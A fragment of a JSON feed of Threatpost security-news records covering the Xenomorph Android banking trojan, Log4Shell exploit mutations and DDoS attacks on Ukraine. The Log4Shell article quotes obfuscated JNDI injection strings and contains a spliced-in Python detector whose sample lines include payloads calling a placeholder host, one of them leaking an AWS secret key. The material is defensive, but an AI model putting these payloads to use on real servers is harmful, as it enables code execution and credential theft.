"cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-22T18:08:28", "description": "An Android trojan dubbed Xenomorph has nested in Google Play, already racking up more than 50,000 downloads from the official app store, researchers warned. For anyone who downloaded the \u201cFast Cleaner\u201d app, it\u2019s time to nuke it from orbit.\n\nAccording to a ThreatFabric analysis, Xenomorph has a target list of 56 different European banks, for which it provides convincing facsimiles of log-in pages whenever a victim attempts to log into a mobile banking app. 
The goal, of course, is to steal any credentials that victims enter into the faux log-in overlay.\n\nHowever, the malware is also a flexible, modular banking trojan, which has code overlaps and other ties to the Alien malware \u2013 hence the name. It notably contains the ability to abuse Android\u2019s accessibility services for broad control over a device\u2019s capabilities, which could open the door to dangerous features that go beyond hijacking mobile banking credentials.\n\n\u201cThe Accessibility engine powering this malware, together with the infrastructure and command-and-control (C2) protocol, are carefully designed to be scalable and updatable,\u201d the researchers warned in a [Monday posting](<https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html>). \u201cThe information stored by the logging capability of this malware is very extensive, and if sent back to the C2 server, could be used to implement keylogging, as well as collecting behavioral data on victims and on installed applications, even if they are not part of the list of targets.\u201d\n\nThat advanced functionality is not yet implemented, so the researchers have deemed Xenomorph as still under development. However, they noted that it\u2019s already making a mark on the banking trojan front: \u201cXenomorph is already sporting effective overlays [for banking apps] and being actively distributed on official app stores.\u201d\n\nIt also uses SMS and notification-interception to log and use potential two-factor authentication (2FA) tokens, according to ThreatFabric. 
And, they added, \u201cIt would be unsurprising to see this bot sport semi-automatic transfer system (ATS) capabilities in the very near future.\u201d\n\nATS is the process of automatically initiating wire transfers from the victims without needing to use credentials, thus bypassing 2FA and all anti-fraud measures.\n\nThreatFabric observed the malware being loaded by a dropper hiding in a Google Play application called \u201cFast Cleaner\u201d (since reported to Google). Sporting 50,000 installations, it purported to remove unused clutter and battery optimization blocks for better device processing times.\n\n\u201cThis is not an uncommon lure, and we have seen malware families like Vultur and Alien being deployed by such application[s],\u201d the researchers said.\n\n## **Inside the Shell: Xenomorph\u2019s Core Functionality**\n\nIn terms of its main overlay attack vector, Xenomorph is powered by Accessibility Services privileges, the researchers found.\n\n\u201cOnce the malware is up and running on a device, its background services receive Accessibility events whenever something new happens on the device,\u201d they explained in a Monday posting. \u201cIf the application opened is part of the list of targets, then Xenomorph will trigger an overlay injection and show a WebView Activity posing as the targeted package.\u201d\n\nMore specifically, once installed, the malware enumerates and sends back a list of installed packages on the infected device. 
Based on what targeted applications are present, it goes on to download the corresponding overlays to inject.\n\n\u201cThe list of overlay targets returned by Xenomorph includes targets from Spain, Portugal, Italy and Belgium, as well as some general purpose applications like emailing services, and cryptocurrency wallets,\u201d according to ThreatFabric.\n\nAfter obtaining Accessibility Services privileges, Xenomorph will first register and verify itself with the C2, by sending a request using the legitimate, open-source project Retrofit2 (a type-safe REST client for Android, Java and Kotlin developed by Square).\n\nThat first message contains the initial information exfiltrated about the device, according to ThreatFabric. After that, Xenomorph periodically polls for new commands from the C2.\n\nFor now, the commands allow the malware to log SMS messages, list the web injects sent by the C2, enable or disable notification interception, and enumerate installed apps.\n\nMeanwhile, the malware also performs the aforementioned logging: \u201cAll the information gathered is only displayed on the local device logs, but in the future a very minor modification would be enough to add keylogging and Accessibility logging capabilities to the malware,\u201d researchers warned.\n\n## **Part of the Alien Franchise?**\n\nThreatFabric\u2019s analysis uncovered evidence of code reuse that links Xenomorph to the known Alien malware, which is a descendant of the [infamous Cerberus malware](<https://threatpost.com/cerberus-banking-trojan-unleashed-google-play/157218/>).\n\nThese include the \u201cuse of the same HTML resource page to trick victims into granting the Accessibility Services privileges.\u201d And further, Xenomorph uses state-tracking through the use of the \u201cSharedPreferences\u201d file.\n\n\u201cThis file is commonly used to track the state of an application,\u201d researchers noted. 
\u201cHowever, the style of variable naming used by Xenomorph is very reminiscent of Alien, despite being potentially even more detailed.\u201d\n\nThey added, \u201cpotentially the most interesting fact is the actual name of the sharedPreferences file used to store the configuration for Xenomorph: the file is named ring0.xml. This might look like any other generic random string, but it happens to coincide with the name of the supposed actor behind the development of the original Alien malware.\u201d\n\nEven though for now Xenomorph is a fairly typical banking trojan, ThreatFabric noted that it does have untapped potential.\n\n\u201cModern banking malware is evolving at a very fast rate, and criminals are starting to adopt more refined development practices to support future updates,\u201d researchers concluded. \u201cXenomorph is at the forefront of this change\u2026ThreatFabric predicts that with some more time to finish development, this malware could reach higher threat levels, comparable to other modern Android banking trojans.\u201d\n\n_**Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>), \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. 
[REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be **_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-22T18:00:30", "type": "threatpost", "title": "Xenomorph Malware Burrows into Google Play Users, No Facehugger Required", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T18:00:30", "id": "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "href": "https://threatpost.com/xenomorph-malware-google-play-facehugger/178563/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:35", "description": "The internet has a fast-spreading, malignant cancer \u2013 otherwise known as the Apache Log4j logging library exploit \u2013 that\u2019s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.\n\nMost of the attacks focus on cryptocurrency mining done on victims\u2019 dimes, as seen by 
[Sophos](<https://twitter.com/SophosLabs/status/1470213371521810432>), [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/?ranMID=24542&ranEAID=TnL5HPStwNw&ranSiteID=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&epi=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&irgwc=1&OCID=AID2200057_aff_7593_1243925&tduid=%28ir__cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600%29%287593%29%281243925%29%28TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA%29%28%29&irclickid=_cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600>) and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.\n\nAccording to [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) researchers, beyond coin-miners, they\u2019ve also seen installations of [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.\n\nAlso, it could get a lot worse. Cybersecurity researchers at [Check Point warned](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.\n\n\u201cSince Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,\u201d they said.\n\nThe flaw, which is uber-easy to exploit, has been named [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>). It\u2019s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. 
It first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.\n\n## Mutations May Enable Exploits to Slip Past Protections\n\nOn Monday, Check Point reported that Log4Shell\u2019s new, malignant offspring can now be exploited \u201ceither over HTTP or HTTPS (the encrypted version of browsing),\u201d they said.\n\nThe more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. \u201cIt means that one layer of protection is not enough, and only multilayered security postures would provide a resilient protection,\u201d they wrote.\n\nBecause of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.\n\n## Tactical Shifts\n\nBesides variations that can slip past protections, researchers are also seeing new tactics.\n\nLuke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that initial exploit attempts were basic call backs, with the initial exploit attempt coming from TOR nodes. They mostly pointed back to \u201cbingsearchlib[.]com,\u201d with the exploit being passed into the User Agent or the Uniform Resource Identifier (URI) of the request.\n\nBut since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. 
Notably, there\u2019s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.\n\n\u201cThis originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,\u201d Richards explained in an email. Following this, the attackers started obfuscating the Java Naming and Directory Interface (JNDI) string itself, by taking advantage of Log4j\u2019s other lookup substitutions (such as `${lower:...}` and `${env:NAME:-default}`) to assemble the `jndi` keyword only when the log message is processed, so that a pattern match on the literal `${jndi:` no longer fires.\n\nHe offered these examples:\n\n`${jndi:${lower:l}${lower:d}a${lower:p}://world80` \n`${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//` \n`${jndi:dns://`\n\n\u2026All of which achieve the same objective: \u201cto download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,\u201d Richards said.\n\n## Bug Has Been Targeted All Month\n\nAttackers have been buzzing around the Log4Shell vulnerability since at least Dec. 
1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.\n\nOn Sunday, Sophos researchers [said](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1470213367142965254%7Ctwgr%5E%7Ctwcon%5Es1_c10&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost-new.php>) that they\u2019d \u201calready detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,\u201d noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.\n\n> Sophos has already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability, and log searches by other organizations (including Cloudflare) suggest the vulnerability may have been openly exploited for weeks. 11/16 [pic.twitter.com/dbAXG5WdZ8](<https://t.co/dbAXG5WdZ8>)\n> \n> \u2014 SophosLabs (@SophosLabs) [December 13, 2021](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw>)\n\n\u201cEarliest evidence we\u2019ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,\u201d Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) on Saturday. \u201cThat suggests it was in the wild at least nine days before publicly disclosed. However, don\u2019t see evidence of mass exploitation until after public disclosure.\u201d\n\nOn Sunday, Cisco Talos [chimed in](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>) with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. 
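When expanding a log hunt back to early December, a plain grep for `${jndi:` misses the obfuscated variants Richards quoted above. The following Python is an added example (not code from the Threatpost article, Vectra, or any vendor tool): it undoes the `${lower:...}`, `${env:NAME:-default}` and `${::-x}` substitutions the way Log4j 2.x would before looking for `jndi:`, so all three quoted variants reduce to the same plain string. It also percent-decodes each line first, which goes beyond the article because attackers commonly URL-encode `${` in the request path. The request-log lines, the `evil.example` host and the function names are constructed for this example; nothing is fetched from the network.

```python
import re
from urllib.parse import unquote

# One Log4j lookup whose body holds no further "${": these are resolved first,
# so nested tricks unwind from the inside out.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# What a de-obfuscated JNDI lookup looks like once substitution has run.
JNDI = re.compile(r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://[^\s}\"']*", re.I)


def resolve_lookup(body: str) -> str:
    """Evaluate one ${...} body the way Log4j 2.x substitution would for the
    lookups exploit authors use as padding.

    ${x:-d} yields d when lookup x resolves to nothing; ${env:ENV_NAME:-j} and
    ${::-j} rely on exactly that. Lookups that read host state (env, sys, ...)
    are never evaluated here: they count as failed, so the attacker's default
    is taken. A jndi body is wrapped in NUL sentinels instead of ${...} so the
    loop in normalize() terminates and the keyword survives verbatim.
    """
    default = None
    if ":-" in body:
        body, default = body.split(":-", 1)
    prefix, sep, arg = body.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if prefix == "date" and len(arg) >= 2 and arg[0] == arg[-1] == "'":
        return arg[1:-1]  # quoted literal in a SimpleDateFormat pattern, e.g. ${date:'j'}
    if prefix == "jndi":
        return "\x00jndi" + sep + arg + "\x00"
    # env, sys, main, ctx, ...: assume the lookup failed and the default applied.
    # Log4j itself would leave an undefaulted failed lookup as literal text (so
    # the exploit string never joins up); dropping it is the conservative choice
    # for a hunt, since it can only create a hit, never hide one.
    return default if default is not None else ""


def normalize(text: str, max_rounds: int = 64) -> str:
    """Percent-decode, then resolve nested lookups until none are left."""
    text = unquote(text)  # %24%7B -> ${ ; a no-op on already-plain text
    for _ in range(max_rounds):  # nesting depth is attacker-controlled, so bound it
        resolved = LOOKUP.sub(lambda m: resolve_lookup(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text.replace("\x00", "")


def find_jndi(line: str):
    """Return (scheme, normalized payload) when the line carries a JNDI lookup, else None."""
    m = JNDI.search(normalize(line))
    return (m.group(1).lower(), m.group(0)) if m else None


def hunt(lines):
    """Run find_jndi over an iterable of log lines; return [(line_no, scheme, payload), ...]."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_jndi(line)
        if found:
            hits.append((n, *found))
    return hits


# Constructed request-log lines for this example (evil.example is a placeholder host).
SAMPLE_LINES = [
    'GET /login HTTP/1.1 "User-Agent: ${jndi:ldap://evil.example:1389/a}"',
    'GET / HTTP/1.1 "User-Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://evil.example/x}"',
    'GET /${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//evil.example/y} HTTP/1.1',
    'GET /?q=${jndi:dns://${env:AWS_SECRET_ACCESS_KEY}.evil.example} HTTP/1.1',
    'GET /?x=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7Ddi%3Aldap%3A%2F%2Fevil.example%2Fz%7D HTTP/1.1',
    'GET /docs/jndi-tutorial HTTP/1.1 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, scheme, payload in hunt(SAMPLE_LINES):
        print(f"line {line_no}: {scheme:<5} {payload}")
```

Run it over every logged field an attacker controls (path, query string, User-Agent, Referer, X-Forwarded-For and any custom headers), not only the User-Agent and URI the first wave used. The `dns://` line shows the credential-leak variant: the `${env:...}` inside the hostname is what exfiltrates a secret, so a hit with that scheme deserves the same priority as an `ldap://` one.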
\u201cIt is recommended that organizations expand their hunt for scanning and exploit activity to this date,\u201d it advised.\n\n## Exploits Attempted on 40% of Corporate Networks\n\nCheck Point said on Monday that it\u2019s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it\u2019s seen more than 100 attempts to exploit the vulnerability per minute.\n\nAs of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.\n\nThe map below illustrates the top targeted geographies.\n\n[Map of top targeted geographies](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/13121325/map.jpg>)\n\nTop affected geographies. Source: Check Point.\n\nHyperbole isn\u2019t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: \u201cIt wouldn\u2019t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,\u201d Dali noted via email on Monday. \u201cConnecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren\u2019t taken right away.\u201d\n\nAs has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability \u201cis relatively easy to exploit, and we\u2019ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,\u201d Dali reiterated. \u201cHopefully every organization running Java has the ability to secure, configure and manage it. 
If Java is being used in production systems IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.\u201d\n\nThis situation is rapidly evolving, so keep an eye out for additional news. Below are some of the related pieces we\u2019ve seen, along with some of the new protections and detection tools.\n\n## More News\n\n * [**Linux botnets have already exploited the flaw.**](<https://securityaffairs.co/wordpress/125562/malware/linux-botnets-log4shell-flaw.html?utm_source=feedly&utm_medium=rss&utm_campaign=linux-botnets-log4shell-flaw>) [NetLab 360](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) reported on Saturday that two of its honeypots have been attacked by the [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>) and [Mirai](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) botnets. Following detection of those attacks, the Netlab 360 team found [other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) on the hunt for the Log4Shell vulnerability, including the DDoS family Elknot, the mining family m8220, SitesLoader, xmrig.pe, xmring.ELF, attack tool 1, attack tool 2, plus one unknown and a PE family. 
[BleepingComputer](<https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/>) also reports that it\u2019s observed the threat actors behind the [Kinsing](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) backdoor and cryptomining botnet \u201cheavily abusing the Log4j vulnerability.\u201d\n * [**CISA has added Log4Shell to the Known Exploited Vulnerabilities Catalog**](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog>).\n * [**Quebec shut down thousands of sites**](<https://securityaffairs.co/wordpress/125556/hacking/quebec-shut-down-sites-log4shell.html?utm_source=feedly&utm_medium=rss&utm_campaign=quebec-shut-down-sites-log4shell>) after disclosure of the Log4Shell flaw. \u201cWe need to scan all of our systems,\u201d said Eric Caire, Quebec\u2019s Minister Responsible for Digital Transformation and Access to Information, in a news conference. \u201cWe\u2019re kind of looking for a needle in a haystack.\u201d\n\n## New Protections, Detection Tools\n\n * On Saturday, Huntress Labs released a tool \u2013 [available here](<https://log4shell.huntress.com/>) \u2013 to help organizations test whether their applications are vulnerable to CVE-2021-44228.\n * Cybereason released [Logout4Shell](<https://github.com/Cybereason/Logout4Shell>), a \u201cvaccine\u201d for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off. It is a stopgap for systems that cannot be patched immediately, not a substitute for updating Log4j.\n\n## Growing List of Affected Manufacturers, Components\n\nAs of Monday, the internet was still in meltdown drippy mode, with an ever-growing, crowd-sourced list [hosted on GitHub](<https://github.com/YfryTchsGD/Log4jAttackSurface>) that only scratches the surface of the millions of applications and manufacturers that use log4j for logging. 
The list indicates whether they\u2019re affected by Log4Shell and provides links to evidence if they are.\n\nSpoiler alert: Most are, including:\n\n * [Amazon](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Amazon.md>)\n * [Apache Druid](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheDruid.md>)\n * [Apache Solr](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheSolr.md>)\n * [Apache Struts2](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheStruts2.md>)\n * [Apple](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/apple.md>)\n * [Baidu](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Baidu.md>)\n * [CloudFlare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/CloudFlare.md>)\n * [DIDI](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/DIDI.md>)\n * [ElasticSearch](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ElasticSearch.md>)\n * [Google](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Google.md>)\n * [JD](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/JD.md>)\n * [LinkedIn](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/LinkedIn.md>)\n * [NetEase](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/NetEase.md>)\n * [Speed camera LOL](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/SpeedCamera.md>)\n * [Steam](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Steam.md>)\n * [Tesla](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tesla.md>)\n * [Tencent](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tencent.md>)\n * [Twitter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Twitter.md>)\n * [VMWare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWare.md>)\n * 
[VMWarevCenter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWarevCenter.md>)\n * [Webex](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Webex.md>)\n\n## A Deep Dive and Other Resources\n\n * **Immersive Labs** has posted a[ hands-on lab](<https://www.linkedin.com/posts/immersive-labs-limited_in-december-a-zero-day-vulnerability-affecting-activity-6876088019028336640-MtYh>) of the incident.\n * **Lacework** has published a [blog post ](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) regarding how the news affects security best practices at the developer level.\n * **NetSPI** has published a [blog post](<https://www.netspi.com/blog/executive/security-industry-trends/log4j-zero-day-vulnerability-impact/>) that includes details on Log4Shell\u2019s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.\n\nThis is a developing story \u2013 stay tuned to Threatpost for ongoing coverage.\n\n121321 13:32 UPDATE 1: Added input from Dor Dali and Luke Richards. \n121321 14:15 UPDATE 2: Added additional botnets detected by NetLab 360.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). 
This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. \n_** \n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:14:46", "type": "threatpost", "title": "Log4Shell Is Spawning Even Nastier Mutations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:14:46", "id": "THREATPOST:34D98758A035C36FED68DDD940415845", "href": 
"https://threatpost.com/apache-log4j-log4shell-mutations/176962/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:54", "description": "On Tuesday, institutions central to Ukraine\u2019s military and economy were hit with a wave of denial-of-service (DoS) attacks, which sparked an avalanche of headlines around the world. The strike itself had limited impact \u2014 but the larger implications for critical infrastructure beyond the Ukraine are worth noting, researchers said.\n\nThe targets were core entities to Ukraine: the Armed Forces of Ukraine, the Ministry of Defense, Oschadbank (the State Savings Bank) and Privatbank, the country\u2019s largest commercial bank, servicing nearly [20 million](<https://en.privatbank.ua/about>) customers. Oschadbank and Privatbank are considered \u201c[systemically important](<https://bank.gov.ua/en/news/all/natsionalniy-bank-onoviv-perelik-sistemno-vajlivih-bankiv>)\u201d to Ukraine\u2019s financial markets.\n\nAdam Meyers, senior vice president of intelligence at CrowdStrike, said via email that the attacks consisted of \u201ca large volume of traffic, three orders of magnitude more than regularly observed traffic, with 99 percent of this traffic consisting of HTTPs requests.\u201d\n\n## **What Happened?**\n\nBy overloading targeted servers, this kind of DoS attack ensured that end users couldn\u2019t access their websites, bank accounts and so on for a period of time. 
As Ukraine\u2019s Center for Strategic Communications noted in a Facebook [post](<https://www.facebook.com/StratcomCentreUA/posts/290808713119116>), some Privatbank customers found themselves \u201ccompletely unable to access\u201d the company\u2019s app, while others\u2019 accounts \u201cdo not reflect balance and recent transactions.\u201d\n\nSome customers received SMS messages claiming that ATMs were out of order, according to Ukraine\u2019s Cyberpolice, which [tweeted](<https://twitter.com/CyberpoliceUA/status/1493578811492950020>) the claim. Those reports, however, were debunked, [according to](<https://www.npr.org/2022/02/15/1080876311/ukraine-hack-denial-of-service-attack-defense>) NPR.\n\nCrucially, the attackers disrupted the _availability_ of these websites and services, but not the _integrity_ of any data. Thus, the transactions, balances and private information associated with bank accounts and military databases appear to be untainted, according to reports.\n\n[And, according](<https://cip.gov.ua/en/news/shodo-kiberataki-na-saiti-viiskovikh-struktur-ta-derzhavnikh-bankiv>) to Ukraine\u2019s State Special Communications Service, a \u201cworking group of experts\u201d convened yesterday to take \u201call necessary measures to localize and resist the cyberattack.\u201d All affected banking services had resumed by 7:30 p.m. local time on Tuesday, and the websites for the Armed Forces and Ministry of Defense have since been restored.\n\n\u201cThe DDoS attacks against the Ukrainian defense ministry and financial institutions appear to be harassment similar to the previous DDoS attacks [seen in January](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>),\u201d Rick Holland, CISO at Digital Shadows, said via email. 
